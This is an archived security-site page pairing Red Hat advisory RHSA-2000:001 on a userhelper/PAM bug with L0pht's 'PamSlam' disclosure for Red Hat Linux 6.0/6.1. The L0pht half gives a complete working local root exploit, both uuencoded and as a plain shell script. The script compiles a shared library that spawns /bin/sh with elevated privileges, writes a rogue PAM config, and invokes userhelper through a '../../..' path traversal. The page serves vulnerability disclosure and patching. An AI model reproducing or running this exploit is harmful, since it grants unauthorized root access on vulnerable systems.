Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Red Hat/Fedora :: userhe~1.txt

Red Hat Linux 6.0 and 6.1: A security bug was found in userhelper; the bug can be exploited to provide local users with root access.





[ http://www.rootshell.com/ ]

Date: Tue, 04 Jan 2000 11:58:23 -0500
From: Michael K. Johnson <johnsonm@redhat.com>

---------------------------------------------------------------------
		   Red Hat, Inc. Security Advisory

Synopsis:		New version of usermode fixes security bug
Advisory ID:		RHSA-2000:001-01
Issue date:		2000-01-04
Updated on:		2000-01-04	
Keywords:		root userhelper pam
Cross references:	
---------------------------------------------------------------------

1. Topic:

A security bug has been discovered and fixed in the userhelper program.

2. Relevant releases/architectures:

Red Hat Linux 6.0 and 6.1, all architectures.

3. Problem description:

A security bug was found in userhelper; the bug can be exploited to
provide local users with root access.

The bug has been fixed in userhelper-1.17, and pam-0.68-10 has been
modified to help prevent similar attacks on other software in the future.

4. Solution:

For each RPM for your particular architecture, run:
    rpm -Uvh <filename>
where filename is the name of the RPM.

5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla/ for more info):

6. Obsoleted by:

7. Conflicts with:

8. RPMs required:

Intel:
  ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
  ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm

Alpha:
  ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
  ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm

Sparc:
  ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
  ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm

Source packages:
  ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
  ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm


9. Verification:

MD5 sum                           Package Name 
-------------------------------------------------------------------------- 
bffd4388103fa99265e267eab7ae18c8  i386/pam-0.68-10.i386.rpm
2d69859d2b1d2180d254fc263bdccf94  i386/usermode-1.17-1.i386.rpm
fed2c2ad4f95829e14727a9dfceaca07  alpha/pam-0.68-10.alpha.rpm
83c69cb92b16bb0eef295acb4c857657  alpha/usermode-1.17-1.alpha.rpm
350662253d09b17d0aca4e9c7a511675  sparc/pam-0.68-10.sparc.rpm
d89495957c9a438fda657b8a4a5f5578  sparc/usermode-1.17-1.sparc.rpm
f9ad800f56b7bb05ce595bad824a990d  SRPMS/pam-0.68-10.src.rpm
1d3b367d257a57de7d834043a4fcd87a  SRPMS/usermode-1.17-1.src.rpm

 
These packages are GPG signed by Red Hat, Inc. for security.  Our key
is available at:
    http://www.redhat.com/corp/contact.html
 
You can verify each package with the following command:
    rpm --checksig  <filename>

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the md5sum with the following command:
    rpm --checksig --nogpg <filename>

10. References:

Thanks to dildog@l0pht.com for finding this bug.

--------------------------------------------------------------------------

From dildog@L0PHT.COM Tue Jan  4 21:25:18 2000
Date: Tue, 4 Jan 2000 20:09:05 -0500
From: Dildog <dildog@L0PHT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper

                       L0pht Security Advisory

        Advisory Name: PamSlam
    Advisory Released: [01/04/00]
          Application: userhelper and PAM on Redhat Linux 6.0/6.1
             Severity: A local user can gain root access.
               Status: Vendor contacted. Fix provided by vendor.
                       Advisory released.
               Author: dildog@l0pht.com
                  WWW: http://www.l0pht.com/advisories.html

Overview:

 	Both 'pam' and 'userhelper' (a setuid binary that comes with the
'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
_pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
being setuid means we can get root.

Description:

	The combination of the fact that both userhelper and PAM follow ..
paths allows us to craft up a file that causes userhelper (by way of PAM) to
dlopen any shared object we want as root. The exploit is simple, and utilizes
the '-w' option of userhelper, which lets us specify a program to run with the
privileges designated by PAM. This tries to only execute programs that have
entries in /etc/security/console.apps, but since we get to specify the name,
something like ../../../tmp/myprog gets us a file open path that looks like
/etc/security/console.apps/../../../tmp/myprog. "strcat" is not a good way to
keep a filename below a directory!

	After this hurdle, PAM is called to start up the binary, and it does
the same thing, looking for the filename in /etc/pam.d. If we've placed a rogue
pam.d configuration file in /tmp/myprog, then it can be pointed to
/etc/pam.d/../../../tmp/myprog. In the pam.d configuration file, we get to pick
a few shared libraries to dlopen, so at this point, we get root.

The following exploit demonstrates this vulnerability by creating a
'rootshell library' that creates a shell when dlopened, creating a pam.d-style
configuration file, and then running userhelper with the appropriately dotted
path.


Quick solution:

	Download the fix from RedHat at:

   Intel:
   ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
   ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm

   Alpha:
   ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
   ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm

   Sparc:
   ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
   ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm

   Source packages:
   ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
   ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm

   Red Hat Linux 6.0:

   Intel:
   ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
   ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
   ftp://updates.redhat.com/6.0/i386/SysVinit-2.77-2.i386.rpm

   Alpha:
   ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
   ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm
   ftp://updates.redhat.com/6.0/alpha/SysVinit-2.77-2.alpha.rpm

   Sparc:
   ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
   ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm
   ftp://updates.redhat.com/6.0/sparc/SysVinit-2.77-2.sparc.rpm

   Source packages:
   ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
   ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
   ftp://updates.redhat.com/6.0/SRPMS/SysVinit-2.77-2.src.rpm
	
Exploit:

Uudecode the following script. Run the script.

begin 755 pamslam.sh
M(R$O8FEN+W-H"B,*(R!P86US;&%M("T@=G5L;F5R86)I;&ET>2!I;B!2961H
M870@3&EN=7@@-BXQ(&%N9"!004T@<&%M7W-T87)T"B,@9F]U;F0@8GD@9&EL
M9&]G0&PP<&AT+F-O;0HC("`*(R!S>6YO<'-I<SH*(R`@("!B;W1H("=P86TG
M(&%N9"`G=7-E<FAE;'!E<B<@*&$@<V5T=6ED(&)I;F%R>2!T:&%T(&-O;65S
M('=I=&@@=&AE"B,@("`@)W5S97)M;V1E+3$N,34G(')P;2D@9F]L;&]W("XN
M('!A=&AS+B!3:6YC92!P86U?<W1A<G0@8V%L;',@9&]W;B!T;PHC("`@(%]P
M86U?861D7VAA;F1L97(H*2P@=V4@8V%N(&=E="!I="!T;R!D;&]P96X@86YY
M(&9I;&4@;VX@9&ES:RX@)W5S97)H96QP97(G"B,@("`@8F5I;F<@<V5T=6ED
M(&UE86YS('=E(&-A;B!G970@<F]O="X@"B,*(R!F:7@Z(`HC("`@($YO(&9U
M8VMI;B!I9&5A(&9O<B!A(&=O;V0@9FEX+B!'970@<FED(&]F('1H92`N+B!P
M871H<R!I;B!U<V5R:&5L<&5R(`HC("`@(&9O<B!A('%U:6-K(&9I>"X@4F5M
M96UB97(@)W-T<F-A="<@:7-N)W0@82!V97)Y(&=O;V0@=V%Y(&]F(&-O;F9I
M;FEN9PHC("`@(&$@<&%T:"!T;R!A('!A<G1I8W5L87(@<W5B9&ER96-T;W)Y
M+@HC"B,@<')O<',@=&\@;7D@;6]M;7D@86YD(&1A9&1Y+"!C=7H@=&AE>2!M
M861E(&UE(&1R:6YK(&UY(&UI;&LN"@IC870@/B!?<&%M<VQA;2YC(#P\($5/
M1@HC:6YC;'5D93QS=&1L:6(N:#X*(VEN8VQU9&4\=6YI<W1D+F@^"B-I;F-L
M=61E/'-Y<R]T>7!E<RYH/@IV;VED(%]I;FET*'9O:60I"GL*("`@('-E='5I
M9"AG971E=6ED*"DI.PH@("`@<WES=&5M*"(O8FEN+W-H(BD["GT*14]&"@IE
M8VAO("UN("X*"F5C:&\@+64@875T:%Q<=')E<75I<F5D7%QT)%!71"]?<&%M
M<VQA;2YS;R`^(%]P86US;&%M+F-O;F8*8VAM;V0@-S4U(%]P86US;&%M+F-O
M;F8*"F5C:&\@+6X@+@H*9V-C("UF4$E#("UO(%]P86US;&%M+F\@+6,@7W!A
M;7-L86TN8PH*96-H;R`M;B!O"@IL9"`M<VAA<F5D("UO(%]P86US;&%M+G-O
M(%]P86US;&%M+F\*"F5C:&\@+6X@;PH*8VAM;V0@-S4U(%]P86US;&%M+G-O
M"@IE8VAO("UN($\*"G)M(%]P86US;&%M+F,*<FT@7W!A;7-L86TN;PH*96-H
M;R!/"@HO=7-R+W-B:6XO=7-E<FAE;'!E<B`M=R`N+B\N+B\N+B105T0O7W!A
M;7-L86TN8V]N9@H*<VQE97`@,7,*"G)M(%]P86US;&%M+G-O"G)M(%]P86US
*;&%M+F-O;F8*"@``
`
end



Boing.

dildog@l0pht.com

  [ For more advisories check out http://www.l0pht.com/advisories.html ]

--------------------------------------------------------------------------

#!/bin/sh
#
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by dildog@l0pht.com
#  
# synopsis:
#    both 'pam' and 'userhelper' (a setuid binary that comes with the
#    'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
#    _pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
#    being setuid means we can get root. 
#
# fix: 
#    No fuckin idea for a good fix. Get rid of the .. paths in userhelper 
#    for a quick fix. Remember 'strcat' isn't a very good way of confining
#    a path to a particular subdirectory.
#
# props to my mommy and daddy, cuz they made me drink my milk.

cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
    setuid(geteuid());
    system("/bin/sh");
}
EOF

echo -n .

echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf

echo -n .

gcc -fPIC -o _pamslam.o -c _pamslam.c

echo -n o

ld -shared -o _pamslam.so _pamslam.o

echo -n o

chmod 755 _pamslam.so

echo -n O

rm _pamslam.c
rm _pamslam.o

echo O

/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf

sleep 1s

rm _pamslam.so
rm _pamslam.conf



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH